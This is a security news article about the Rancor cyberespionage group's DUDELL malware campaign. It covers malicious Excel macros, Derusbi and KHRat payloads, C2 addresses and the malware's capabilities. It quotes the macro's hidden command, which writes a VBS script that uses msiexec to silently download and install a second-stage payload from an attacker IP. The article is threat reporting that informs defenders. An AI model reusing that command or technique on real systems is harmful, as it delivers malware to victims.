Custom Malware

Researchers discovered a new wave of custom malware campaign named as “Dudell” from previous unknown cyberespionage group dubbed Rancor.

Rancor Threat group active since 2017, and they continuously targeting the government organization until January 2019, in this current campaign, researchers discovered an undocumented custom malware.

Additionally, the group using another malware family called “Derusbi” to load a secondary payload once it infiltrates a target, and malware will be installed in the victim’s machine by conducting 2 rounds of attack.

Researchers observed that, the attacker sent via 149.28.156[.]61 to deliver either Derusbi or KHRat samples with either  cswksfwq.kfesv[.]xyz or connect.bafunpda[.]xyz as C2.

Rancor has a record of conducting targeted attacks in Southeast Asia throughout 2017 and 2018.

DUDELL Malware Infection Process

DUDELL malware initially observed form weaponized Microsoft excel document via malspam email attachment.

Once the victims open the attachment, a malicious Macro will be triggered and runs on the victim’s machine when clicks “Enable Content”.

During this process, the macro locates and executes the following data located under the Company field in the document’s properties. 

cmd /c set /p=Set v=CreateObject(^”Wscript.Shell^”):v.Run ^”msiexec /q /i http://199.247.6[.]253/ud^”,false,0 <nul > C:\Windows\System32\spool\drivers\color\tmp.vbs

We could see the C2 server IP in this data and the script downloads the second stage of the payload via Microsoft tool msiexec .

Researchers from Palo Alto networks Said, “we discovered a similar VBS script used by the Rancor actors that might give us some clues on what the contents of tmp.vbs would resemble. File office.vbs”

Another export function called DllInstall observed in this campaign which is responsible for the core behavior of the malware.

Once its executed, hidden window created by the malware filters attempt to evade sandbox analysis the malware sends victim information such as: hostname, IP address, Language Pack along with other operating system information.

Malware also has the following capabilities:

  • Terminate a specific process
  • Enumerate processes
  • Upload file
  • Download file
  • Delete file
  • List folder contents
  • Enumerate storage volumes
  • Execute a command
  • Reverse shell
  • Take a screenshot

Researchers observed a VB script named Chrome.vbs that associated with the Rancor group, and the VBScript is obfuscated and contains packed data that is used to infect a target with multiple chained persistent artifacts.

Custom Malware

Indicators of Compromise



Also Read:

Microsoft Warns about the new Campaign that Delivers FlawedAmmyy RAT via Weaponized MS Excel Documents

TA505 APT Hackers Launching ServHelper Backdoor Malware via Weaponized Excel Documents

New CHAINSHOT Malware Attack Carried Adobe Flash 0-day Exploit with Weaponized Microsoft Excel Documents

BALAJI is an Editor-in-Chief, Security Researcher, Author & Co-Founder of GBHackers On Security, Ethical Hackers Academy, Cyber Security News.

Leave a Reply